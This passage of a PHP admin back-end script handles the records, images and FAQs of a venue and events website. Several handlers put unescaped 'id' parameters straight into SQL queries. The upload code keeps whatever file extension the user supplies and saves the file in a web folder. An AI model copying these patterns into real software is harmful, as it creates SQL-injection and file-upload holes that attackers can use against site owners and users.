	$image=$_FILES['image']['name'];
	$image_tmp=$_FILES['image']['tmp_name'];
	$image_extn = substr($image, strrpos($image, '.')+1);
	$image_name=rand(10,100).time().'.'.$image_extn;
	$moveResult=move_uploaded_file($image_tmp, $dir . $image_name);
	if ($moveResult != true) {
	echo "ERROR: File not uploaded. Try again.";
	exit();
	}
	}
	
$layout_offer=$mysqli->query("INSERT INTO `offer` (`offertitle` ,`image`,`description`) VALUES ('$offertitle','$image_name','$description')");

	if($layout_offer)	
	{
		
			header("location:offer.php");
	}
}


///-------------update Offer-----------//
if(isset($_REQUEST['update_offer']))
{
$id=$_REQUEST['id']; 
if(isset($_REQUEST['offertitle']))
{
$offertitle=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['offertitle']));
}
if(isset($_REQUEST['description']))
{
$description=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['description']));
}

if( isset($_FILES['image']['name']) &&  $_FILES['image']['name'] != "" )
	{
	$dir="../upload/";
	$image=$_FILES['image']['name'];
	$image_tmp=$_FILES['image']['tmp_name'];
	$image_extn = substr($image, strrpos($image, '.')+1);
	$image_name=rand(10,100).time().'.'.$image_extn;
	$moveResult=move_uploaded_file($image_tmp, $dir . $image_name);
	if ($moveResult != true) {
	echo "ERROR: File not uploaded. Try again.";
	exit();
	}
	}
	else
	{
	$image_name=$_POST['hidden_image'];
	}
$offer_update=$mysqli->query("UPDATE `offer` SET `offertitle`='$offertitle',`image`='$image_name',`description`='$description' WHERE `id`='$id'");

    if($offer_update)  
    {
        
        header("location:offer.php");
    }
}	 
///----delete testimonail-----/// 
if(isset($_REQUEST['action']) && $_REQUEST['action']=='delete_offer')
{
$id=$_GET['id'];
$sql_offer =$mysqli->query("delete from `offer` where `id`='$id'");
if ($sql_offer==true) {
	header("location:offer.php");  
}

}



///----Add Gallery image -----// 
if(isset($_REQUEST['add_product_category'])){
	
	if(isset($_REQUEST['product_category']))
	{
	$product_category=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['product_category']));
	}
	
	if( isset($_FILES['image']['name']) &&  $_FILES['image']['name'] != "")
	{
	$dir="../upload/";
	$image=$_FILES['image']['name'];
	$image_tmp=$_FILES['image']['tmp_name'];
	$image_extn = substr($image, strrpos($image, '.')+1);
	$image_name=rand(10,100).time().'.'.$image_extn;
	$size=filesize($_FILES['image']['tmp_name']);
	$moveResult=move_uploaded_file($image_tmp, $dir . $image_name);
	if ($moveResult != true) {
	echo "ERROR: File not uploaded. Try again.";
	exit();
	}  
	}
	
	$insertgallery=$mysqli->query("INSERT INTO `product_category` (`product_category`, `image`) VALUES ('$product_category', '$image_name')");
	if($insertgallery)
	{
		
		header('location:product_category.php');
	} 
}

if(isset($_REQUEST['update_product_category'])){
	$id=$_REQUEST['id'];
	if(isset($_REQUEST['product_category']))
	{
	$product_category=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['product_category']));
	}
	
	if( isset($_FILES['image']['name']) &&  $_FILES['image']['name'] != "" )
	{ 
	$dir="../upload/";
	$image=$_FILES['image']['name'];
	$image_tmp=$_FILES['image']['tmp_name'];
	$image_extn = substr($image, strrpos($image, '.')+1);
	$image_name=rand(10,100).time().'.'.$image_extn;
	$size=filesize($_FILES['image']['tmp_name']);
	$moveResult=move_uploaded_file($image_tmp, $dir . $image_name);
	if ($moveResult != true) {
	echo "ERROR: File not uploaded. Try again.";

	exit();
	}
	}
	else
	{
	$image_name=$_POST['hidden_image'];
	}
	
	$updategallery=$mysqli->query("UPDATE `product_category` SET `product_category`='$product_category', `image`='$image_name' WHERE `id`='$id'");
	if($updategallery)
	{
		
		header('location:product_category.php');
	}
}

///----delete image of gallery-----/// 
if(isset($_REQUEST['action']) && $_REQUEST['action']=='delete_product_category')
{
$id=$_GET['id'];
$sql5=$mysqli->query("select * from `product_category` where `id`='$id'");
$row = mysqli_fetch_array($sql5);
$img_name = $row['image'];
unlink("../upload/$img_name");
$sql_gallery =$mysqli->query("delete from `product_category` where `id`='$id'");
if ($sql_gallery==true) {
	header("location:product_category.php");  
}

}

////-----------add Event category-----//////

if(isset($_REQUEST['add_eventcat'])){
	
	if(isset($_REQUEST['title']))
	{
	$title=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['title']));
	}
	
	if( isset($_FILES['image']['name']) &&  $_FILES['image']['name'] != "")
	{
	$dir="../upload/";
	$image=$_FILES['image']['name'];
	$image_tmp=$_FILES['image']['tmp_name'];
	$image_extn = substr($image, strrpos($image, '.')+1);
	$image_name=rand(10,100).time().'.'.$image_extn;
	$size=filesize($_FILES['image']['tmp_name']);
	$moveResult=move_uploaded_file($image_tmp, $dir . $image_name);
	if ($moveResult != true) {
	echo "ERROR: File not uploaded. Try again.";
	exit();
	}  
	}
	
	$insertevent=$mysqli->query("INSERT INTO `event_category` (`title`, `image`) VALUES ('$title', '$image_name')");
	if($insertevent)
	{
		
		header('location:eventcat.php');
	} 
}

if(isset($_REQUEST['update_eventcat'])){
	$id=$_REQUEST['id'];
	if(isset($_REQUEST['title']))
	{
	$title=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['title']));
	}
	
	if( isset($_FILES['image']['name']) &&  $_FILES['image']['name'] != "" )
	{
	$dir="../upload/";
	$image=$_FILES['image']['name'];
	$image_tmp=$_FILES['image']['tmp_name'];
	$image_extn = substr($image, strrpos($image, '.')+1);
	$image_name=rand(10,100).time().'.'.$image_extn;
	$size=filesize($_FILES['image']['tmp_name']);
	$moveResult=move_uploaded_file($image_tmp, $dir . $image_name);
	if ($moveResult != true) {
	echo "ERROR: File not uploaded. Try again.";

	exit();
	}
	}
	else
	{
	$image_name=$_POST['hidden_image'];
	}
	
	$updateevent=$mysqli->query("UPDATE `event_category` SET `title`='$title', `image`='$image_name' WHERE `id`='$id'");
	if($updateevent)
	{
		
		header('location:eventcat.php');
	}
}

///----delete image of event-----/// 
if(isset($_REQUEST['action']) && $_REQUEST['action']=='delete_eventcat')
{
$id=$_GET['id'];
$sql5=$mysqli->query("select * from `event_category` where `id`='$id'");
$row = mysqli_fetch_array($sql5);
$img_name = $row['image'];
unlink("../upload/$img_name");
$sql_gallery =$mysqli->query("delete from `event_category` where `id`='$id'");
if ($sql_gallery==true) {
	header("location:eventcat.php");  
}

}


////-----------add Event Gallery-----//////

if(isset($_REQUEST['add_eventgallery'])){
   
    if(isset($_REQUEST['eventcat_id']))
	{
	$eventcat_id=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['eventcat_id']));
	}
	if(isset($_REQUEST['title']))
	{
	$title=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['title']));
	}
	
	if(isset($_REQUEST['title']))
	{
	$title=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['title']));
	}
	
	if( isset($_FILES['image']['name']) &&  $_FILES['image']['name'] != "")
	{
	$dir="../upload/";
	$image=$_FILES['image']['name'];
	$image_tmp=$_FILES['image']['tmp_name'];
	$image_extn = substr($image, strrpos($image, '.')+1);
	$image_name=rand(10,100).time().'.'.$image_extn;
	$size=filesize($_FILES['image']['tmp_name']);
	$moveResult=move_uploaded_file($image_tmp, $dir . $image_name);
	if ($moveResult != true) {
	echo "ERROR: File not uploaded. Try again.";
	exit();
	}  
	}
	
	$insertevent=$mysqli->query("INSERT INTO `event_gallery` (`eventcat_id`,`title`, `image`) VALUES ('$eventcat_id','$title', '$image_name')");
	if($insertevent)
	{
		
		header('location:eventgallery.php');
	} 
}

if(isset($_REQUEST['update_eventgallery'])){
	$id=$_REQUEST['id'];
    if(isset($_REQUEST['eventcat_id']))
	{
	$eventcat_id=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['eventcat_id']));
	}
	if(isset($_REQUEST['title']))
	{
	$title=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['title']));
	}
	
	if( isset($_FILES['image']['name']) &&  $_FILES['image']['name'] != "" )
	{
	$dir="../upload/";
	$image=$_FILES['image']['name'];
	$image_tmp=$_FILES['image']['tmp_name'];
	$image_extn = substr($image, strrpos($image, '.')+1);
	$image_name=rand(10,100).time().'.'.$image_extn;
	$size=filesize($_FILES['image']['tmp_name']);
	$moveResult=move_uploaded_file($image_tmp, $dir . $image_name);
	if ($moveResult != true) {
	echo "ERROR: File not uploaded. Try again.";

	exit();
	}
	}
	else
	{
	$image_name=$_POST['hidden_image'];
	}
	
	$updateevent=$mysqli->query("UPDATE `event_gallery` SET `eventcat_id`='$eventcat_id',`title`='$title', `image`='$image_name' WHERE `id`='$id'");
	if($updateevent)
	{
		
		header('location:eventgallery.php');
	}
}

///----delete image of Gallery-----/// 
if(isset($_REQUEST['action']) && $_REQUEST['action']=='delete_eventgallery')
{
$id=$_GET['id'];
$sql5=$mysqli->query("select * from `event_gallery` where `id`='$id'");
$row = mysqli_fetch_array($sql5);
$img_name = $row['image'];
unlink("../upload/$img_name");
$sql_gallery =$mysqli->query("delete from `event_gallery` where `id`='$id'");
if ($sql_gallery==true) {
	header("location:eventgallery.php");  
}

}


////-----------add Event-----//////
if(isset($_REQUEST['add_event']))
{
if(isset($_REQUEST['eventcat_id']))
{
$eventcat_id=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['eventcat_id']));
}	
if(isset($_REQUEST['title']))
{
$title=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['title']));
}
if(isset($_REQUEST['pagetitle']))
{
$pagetitle=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['pagetitle']));
}
if(isset($_REQUEST['slug']))
{
$slug=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['slug']));
}
if(isset($_REQUEST['keyword']))
{
$keyword=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['keyword']));
}
if(isset($_REQUEST['seodescription']))
{
 $seodescription=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['seodescription']));
}
if(isset($_REQUEST['adddate']))
{
$adddate=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['adddate']));
}

if( isset($_FILES['image']['name']) &&  $_FILES['image']['name'] != "" )
	{
	$dir="../upload/";
	$image=$_FILES['image']['name'];
	$image_tmp=$_FILES['image']['tmp_name'];
	$image_extn = substr($image, strrpos($image, '.')+1); 
	$image_name=rand(10,100).time().'.'.$image_extn;
	$moveResult=move_uploaded_file($image_tmp, $dir . $image_name);
	if ($moveResult != true) {
	echo "ERROR: File not uploaded. Try again.";
	exit();
	}
	}

if(isset($_REQUEST['description']))
{

 $description=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['description']));
}

$date=date('d-m-Y');


$layout_blog=$mysqli->query("INSERT INTO `event` (`eventcat_id`,`title`, `pagetitle`, `slug`,`keyword`,`seodescription`, `image`,`description`) VALUES ('$eventcat_id','$title','$pagetitle', '$slug','$keyword','$seodescription','$image_name','$description')");

if ($layout_blog) {
	header("location:event.php");
}else{
	header("location:add_event.php");
}

            
	
}

//------Update Event------///
if(isset($_REQUEST['update_event']))
{
$id=$_REQUEST['id'];
if(isset($_REQUEST['eventcat_id']))
{
$eventcat_id=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['eventcat_id']));
}
if(isset($_REQUEST['title']))
{
$title=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['title']));
}
if(isset($_REQUEST['pagetitle']))
{
$pagetitle=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['pagetitle']));
}
if(isset($_REQUEST['slug']))
{
$slug=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['slug']));
}
if(isset($_REQUEST['keyword']))
{
$keyword=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['keyword']));
}
if(isset($_REQUEST['seodescription']))
{
 $seodescription=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['seodescription']));
}
if(isset($_REQUEST['adddate']))
{
$adddate=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['adddate']));
}
if( isset($_FILES['image']['name']) &&  $_FILES['image']['name'] != "" )
	{
	$dir="../upload/";
	$image=$_FILES['image']['name'];
	$image_tmp=$_FILES['image']['tmp_name'];
	$image_extn = substr($image, strrpos($image, '.')+1);
	$image_name=rand(10,100).time().'.'.$image_extn;
	$moveResult=move_uploaded_file($image_tmp, $dir . $image_name);
	if ($moveResult != true) {
	echo "ERROR: File not uploaded. Try again.";
	exit();
	}
	}
	else
	{
	$image_name=$_POST['hidden_image'];
	}

if(isset($_REQUEST['description']))
{

$description=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['description']));
}
// echo "UPDATE `event` SET `eventcat_id`='$eventcat_id',`title`='$title',`pagetitle`='$pagetitle',`slug`='$slug',`keyword`='$keyword',`seodescription`='$seodescription', `image`='$image_name',`description`='$description' WHERE `id`='$id'";
// die();
$layout_update1=$mysqli->query("UPDATE `event` SET `eventcat_id`='$eventcat_id',`title`='$title',`pagetitle`='$pagetitle',`slug`='$slug',`keyword`='$keyword',`seodescription`='$seodescription', `image`='$image_name',`description`='$description' WHERE `id`='$id'");
	if($layout_update1)	
	{            
		
	header("location:event.php");
		       
	}
	else{
		echo "event Has not Update";
	}
}
///----delete Event-----/// 
if(isset($_REQUEST['action']) && $_REQUEST['action']=='delete_event')
{
$id=$_GET['id'];
$sql5=$mysqli->query("select * from `event` where `id`='$id'");
$row = mysqli_fetch_array($sql5);
$img_name = $row['image'];
unlink("../upload/$img_name");
$sql_blog =$mysqli->query("delete from `event` where `id`='$id'");


if ($sql_blog == true)
 {
	     header("location:event.php");  
  }
 

}
//-----END BLOG SECTION -----//


//--------add Offer---------//
if(isset($_REQUEST['add_venue']))
{
if(isset($_REQUEST['title']))
{
 $title=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['title']));
} 
if(isset($_REQUEST['phone']))
{
 $phone=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['phone']));
}
if(isset($_REQUEST['address']))
{
$address=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['address']));
}
if(isset($_REQUEST['location_url']))
{
$location_url=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['location_url']));
}
if(isset($_REQUEST['description']))
{
$description=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['description']));
}

if(isset($_REQUEST['slug']))
{
$slug=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['slug']));
}
if(isset($_REQUEST['keyword']))
{
$keyword=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['keyword']));
}
if(isset($_REQUEST['seodescription']))
{
 $seodescription=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['seodescription']));
}


if( isset($_FILES['image']['name']) &&  $_FILES['image']['name'] != "" )
	{
	$dir="../upload/";
	$image=$_FILES['image']['name'];
	$image_tmp=$_FILES['image']['tmp_name'];
	$image_extn = substr($image, strrpos($image, '.')+1);
	$image_name=rand(10,100).time().'.'.$image_extn;
	$moveResult=move_uploaded_file($image_tmp, $dir . $image_name);
	if ($moveResult != true) {
	echo "ERROR: File not uploaded. Try again.";
	exit();
	}
	}
	
$layout_venue=$mysqli->query("INSERT INTO `venue` (`title` ,`image`,`phone`,`address`,`location_url`,`description`, `slug`,`keyword`,`seodescription`) VALUES ('$title','$image_name','$phone','$address','$location_url','$description', '$slug','$keyword','$seodescription')");

	if($layout_venue)	
	{


		           $last_id = $mysqli->insert_id;
					if (isset($_POST['features'])) {
					    $features = $_POST['features'];

					    foreach ($features as $feature) {
					        $cleaned_feature = mysqli_real_escape_string($mysqli, htmlentities($feature));

					        // Only insert if not empty
					        if (!empty($cleaned_feature)) {
					            $mysqli->query("INSERT INTO `venue_feature`(`venue_id`, `feature`) VALUES ('$last_id', '$cleaned_feature')");
					        }
					    }
					}
	
			header("location:venuefaq.php?venue_id=$last_id");
	}
}


///-------------update Offer-----------//
if(isset($_REQUEST['update_venue']))
{
$id=$_REQUEST['id']; 
if(isset($_REQUEST['title']))
{
 $title=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['title']));
} 
if(isset($_REQUEST['phone']))
{
 $phone=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['phone']));
}
if(isset($_REQUEST['address']))
{
$address=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['address']));
}
if(isset($_REQUEST['location_url']))
{
$location_url=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['location_url']));
}
if(isset($_REQUEST['description']))
{
$description=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['description']));
}
if(isset($_REQUEST['slug']))
{
$slug=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['slug']));
}
if(isset($_REQUEST['keyword']))
{
$keyword=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['keyword']));
}
if(isset($_REQUEST['seodescription']))
{
 $seodescription=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['seodescription']));
}
if( isset($_FILES['image']['name']) &&  $_FILES['image']['name'] != "" )
	{
	$dir="../upload/";
	$image=$_FILES['image']['name'];
	$image_tmp=$_FILES['image']['tmp_name'];
	$image_extn = substr($image, strrpos($image, '.')+1);
	$image_name=rand(10,100).time().'.'.$image_extn;
	$moveResult=move_uploaded_file($image_tmp, $dir . $image_name);
	if ($moveResult != true) {
	echo "ERROR: File not uploaded. Try again.";
	exit();
	}
	}
	else
	{
	$image_name=$_POST['hidden_image'];
	}
	
// 	echo "UPDATE `venue` SET `title`='$title',`image`='$image_name',`phone`='$phone',`address`='$address',`location_url`='$location_url',`description`='$description',`slug`='$slug',`keyword`='$keyword',`seodescription`='$seodescription' WHERE `id`='$id'";
// 	die();
	
$offer_venue=$mysqli->query("UPDATE `venue` SET `title`='$title',`image`='$image_name',`phone`='$phone',`address`='$address',`location_url`='$location_url',`description`='$description',`slug`='$slug',`keyword`='$keyword',`seodescription`='$seodescription' WHERE `id`='$id'");

    if($offer_venue)  
    {
        
        $last_id = $id;
        // Insert and print new features
		    if (isset($_POST['feature']) && is_array($_POST['feature'])) {
		        $features = $_POST['feature'];
		      
		        foreach ($features as $feature) {
		            $cleaned_feature = mysqli_real_escape_string($mysqli, htmlentities($feature));
		            if (!empty($cleaned_feature)) {
		                $mysqli->query("
		                    INSERT INTO `venue_feature` (`venue_id`, `feature`) 
		                    VALUES ('$last_id', '$cleaned_feature')
		                ");

		                
		            }
		        }  
            }

        header("location:venue.php");
    }
}
else{
    echo "Venue has not updated";
}

//-------delete features -----------//
if(isset($_REQUEST['remove_vanue_feature']))
{

$feature_id=$_REQUEST['feature_id'];
$vanue_id=$_REQUEST['vanue_id'];

$sql =$mysqli->query("delete from `venue_feature` where `id`='$feature_id'");
if($sql)    
    {
       header("location:add_venue.php?id=$vanue_id&action=edit_venue");
    }
    else
    {
       echo "fail"; 
    }   
}




//-----------delete car details --------------//
if(isset($_REQUEST['action']) && $_REQUEST['action']=='delete_vanue')
{

$id=$_GET['id'];
$sql1=$mysqli->query("select * from `venue_feature` where `venue_id`='$id'");
$row1 = mysqli_fetch_array($sql1);
$img_name2 = $row1['id'];
$sql_venue_feature=$mysqli->query("delete from `venue_feature` where `id`='$img_name2'");

$sql_venuefaq =$mysqli->query("delete from `venuefaq` where `id`='$id'");

$sql_car=$mysqli->query("select * from `venue` where `id`='$id'");
$row2 = mysqli_fetch_array($sql_car);
$img_name1 = $row2['image'];
unlink("../upload/$img_name1");
$sql_venue =$mysqli->query("delete from `venue` where `id`='$id'");

if ($sql_venue && $sql_venuefaq && $sql_venue_feature == true)
 {

	     header("location:venue.php");  

  }

   
}



//--------add venue FAQ---------//
if(isset($_REQUEST['add_venuefaq']))
{
if(isset($_REQUEST['venue_id']))
{
 $venue_id=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['venue_id']));
}	
if(isset($_REQUEST['question']))
{
 $question=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['question']));
} 
if(isset($_REQUEST['answer']))
{
$answer=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['answer']));
}

	
$layout_update=$mysqli->query("INSERT INTO `venuefaq` (`venue_id` ,`question`,`answer`) VALUES ('$venue_id','$question','$answer')");

	if($layout_update)	
	{
		
			header("location:venuefaq.php?venue_id=$venue_id");
	}
}

if(isset($_REQUEST['update_venuefaq']))
{

$id=$_REQUEST['id']; 
if(isset($_REQUEST['venue_id']))
{
 $venue_id=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['venue_id']));
}   
if(isset($_REQUEST['question']))
{
 $question=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['question']));
} 
if(isset($_REQUEST['answer']))
{
$answer=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['answer']));
}

// echo "UPDATE `servicefaq` SET `service_id`='$service_id',`question`='$question',`answer`='$answer' WHERE `id`='$id'";
// die();

$layout_update=$mysqli->query("UPDATE `venuefaq` SET `venue_id`='$venue_id',`question`='$question',`answer`='$answer' WHERE `id`='$id'");

    if($layout_update)  
    {
        //echo $service_id;
        header("location:venuefaq.php?venue_id=$venue_id");
    }
}
	 
///----delete testimonail-----/// 
if(isset($_REQUEST['action']) && $_REQUEST['action']=='delete_venuefaq')
{
$id=$_GET['id'];
if(isset($_REQUEST['venue_id']))
{
 $venue_id=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['venue_id']));
}
$sql_testimonial =$mysqli->query("delete from `venuefaq` where `id`='$id'");
if ($sql_testimonial==true) {
	header("location:venuefaq.php?venue_id=$venue_id");  
}

}


if(isset($_REQUEST['delete_venuefaq']))
{

 $id=$_REQUEST['faq_id'];

if(isset($_REQUEST['venue_id']))
{
 $venue_id=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['venue_id']));
}

$sql_faq =$mysqli->query("delete from `venuefaq` where `id`='$id'");
if ($sql_faq==true) {

	header("location:add_venue.php?id=$venue_id&action=edit_venue");  
}

}






 ?>

........